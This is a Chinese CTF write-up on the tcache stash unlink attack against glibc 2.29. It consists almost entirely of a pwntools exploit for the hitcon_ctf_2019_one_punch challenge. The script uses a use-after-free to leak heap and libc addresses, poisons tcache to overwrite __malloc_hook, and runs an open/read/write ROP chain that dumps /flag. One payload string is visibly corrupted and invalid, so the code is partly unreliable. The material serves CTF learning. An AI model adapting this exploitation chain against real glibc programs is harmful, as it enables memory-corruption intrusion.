技巧篇:Tcache stash unlink attack(ubuntu19)

前言:今天早上刷题的时候,刷到了一道关于Tcache stash unlink attack的技巧篇,其实简单来说就是tc attack,至于unlink就是为了绕过unlink检测,它还有uaf,开启了沙盒,唯一的突破点是orw,orz。。
还是老样子,弄了一下别的师傅的exp,自己懒得写啦。。还得调试orz orz、、
exp:

#coding:utf-8
from pwn import *
 
#r = remote("node4.buuoj.cn", 27347)  # remote target kept commented out; the script runs locally below
r = process("./hitcon_ctf_2019_one_punch")
 
# debug-level logging shows every byte exchanged with the target
context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0  # set to 1 to attach gdb right after the process starts
if DEBUG:
    gdb.attach(r, 
    '''    
    where
    ''')
 
elf = ELF("./hitcon_ctf_2019_one_punch")
libc = ELF('./libc-2.29.so')
# NOTE(review): not referenced anywhere else in this script; left for reference
one_gadget_19 = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]
 
menu = "> "  # prompt the binary prints before each menu choice
def add(index, content):
    """Drive menu choice 1 (create): answer the index prompt, then send `content` as the hero name."""
    io = r
    for prompt, reply in ((menu, '1'), ("idx: ", str(index))):
        io.recvuntil(prompt)
        io.sendline(reply)
    io.recvuntil("hero name: ")
    io.send(content)  # raw send: no trailing newline is appended to the name
 
def delete(index):
    """Drive menu choice 4 (delete) for the entry at `index`."""
    exchanges = [(menu, '4'), ("idx: ", str(index))]
    for prompt, reply in exchanges:
        r.recvuntil(prompt)
        r.sendline(reply)
 
def edit(index, content):
    """Drive menu choice 2 (edit): select `index`, then send `content` as the new hero name."""
    replies = iter(['2', str(index)])
    for prompt in (menu, "idx: "):
        r.recvuntil(prompt)
        r.sendline(next(replies))
    r.recvuntil("hero name: ")
    r.send(content)  # raw send, as in add(): the name is written without a newline
 
def show(index):
    """Drive menu choice 3 (show) for `index`; the caller reads whatever the binary prints back."""
    io = r
    exchanges = ((menu, '3'), ("idx: ", str(index)))
    for expect, reply in exchanges:
        io.recvuntil(expect)
        io.sendline(reply)
 
def back_door(content):
    """Pick the hidden menu choice (the digits 50056 followed by two NUL bytes), pause, then send `content` raw."""
    io = r
    io.recvuntil(menu)
    io.sendline('50056\x00\x00')
    # no prompt is awaited before the payload, so a fixed one-second delay stands in for one
    sleep(1)
    io.send(content)
 
# Script body: drives the local process started above through the menu helpers.
# fill full tcache size 0x410
for i in range(7):
    add(0, 'a'*0x400)
    delete(0)
# fill 6 in tcache size 0x100
for i in range(6):
    add(1,'b'*0xf0)
    delete(1)
# show(0) on an already-freed entry: the printed name is parsed as an 8-byte pointer
show(0)
r.recvuntil("hero name: ")
last_chunk_addr = u64(r.recvuntil('\n').strip().ljust(8, '\x00'))
heap_addr = last_chunk_addr - 0x16B0  # 0x16B0: offset assumed by the author for this binary/libc
success("heap_base:"+hex(heap_addr))
 
add(0, 'a'*0x400)  #calloc
add(1, 'b'*0x300)
delete(0)
show(0)
r.recvuntil("hero name: ")
malloc_hook = u64(r.recvuntil('\n').strip().ljust(8, '\x00')) - 0x60 - 0x10
libc.address = malloc_hook - libc.sym['__malloc_hook']
# gadget offsets below are specific to the bundled libc-2.29.so
syscall = libc.address + 0x000000000010D022
add_rsp = libc.address + 0x000000000008cfd6
leave = libc.address + 0x0000000000058373
pop_rdi_ret = libc.address + 0x0000000000026542
pop_rsi_ret = libc.address + 0x0000000000026f9e
pop_rdx_ret = libc.address + 0x000000000012bda6
pop_rax_ret = libc.address + 0x0000000000047cf8
success("libc:"+hex(libc.address))
 
add(1, 'b'*0x300)
add(1, 'b'*0x300)#smallbin1
add(0, 'a'*0x400)
add(1, 'b'*0x300)
delete(0)
add(1, 'b'*0x300)
add(1, 'b'*0x300)#smallbin2
 
# NOTE(review): the string literal on the next line is not valid Python (a malformed \x escape);
# it looks like it was corrupted when the post was pasted, so the script does not run as shown.
payload = '\x0x56544280d92000'*0x300+p64(0)+p64(0x101)+p64(heap_addr+0x27D0)+p64(heap_addr+0x30-5-0x10)
edit(0, payload)
 
add(1, '/flag'+'\x00'*0x100)
for i in range(7):
    add(1, 'b'*0x217)
    delete(1)
edit(1, p64(malloc_hook))
add(1, 'b'*0xf0)
back_door(p64(malloc_hook))
back_door(p64(add_rsp))
 
# heap offsets of the file name written above and of the buffer the chain reads into;
# both are author-chosen constants for this binary
file_name_addr = heap_addr + 0x3930
flag_addr = heap_addr + 0x3940
# ROP chain: open / read / write, matching the "orw" the post describes; `leave` is computed above but unused
ROP_chain = p64(pop_rdi_ret)
ROP_chain += p64(file_name_addr)
ROP_chain += p64(pop_rsi_ret)
ROP_chain += p64(0)
ROP_chain += p64(pop_rax_ret)
ROP_chain += p64(2)
ROP_chain += p64(syscall)
#ROP_chain += p64(libc.symbols['open'])
ROP_chain += p64(pop_rdi_ret)
ROP_chain += p64(3)
ROP_chain += p64(pop_rsi_ret)
ROP_chain += p64(flag_addr)
ROP_chain += p64(pop_rdx_ret)
ROP_chain += p64(0x40)
ROP_chain += p64(libc.symbols['read'])
ROP_chain += p64(pop_rdi_ret)
ROP_chain += p64(1)
ROP_chain += p64(pop_rsi_ret)
ROP_chain += p64(flag_addr)
ROP_chain += p64(pop_rdx_ret)
ROP_chain += p64(0x40)
ROP_chain += p64(libc.symbols['write'])
 
add(1, ROP_chain)
r.interactive()
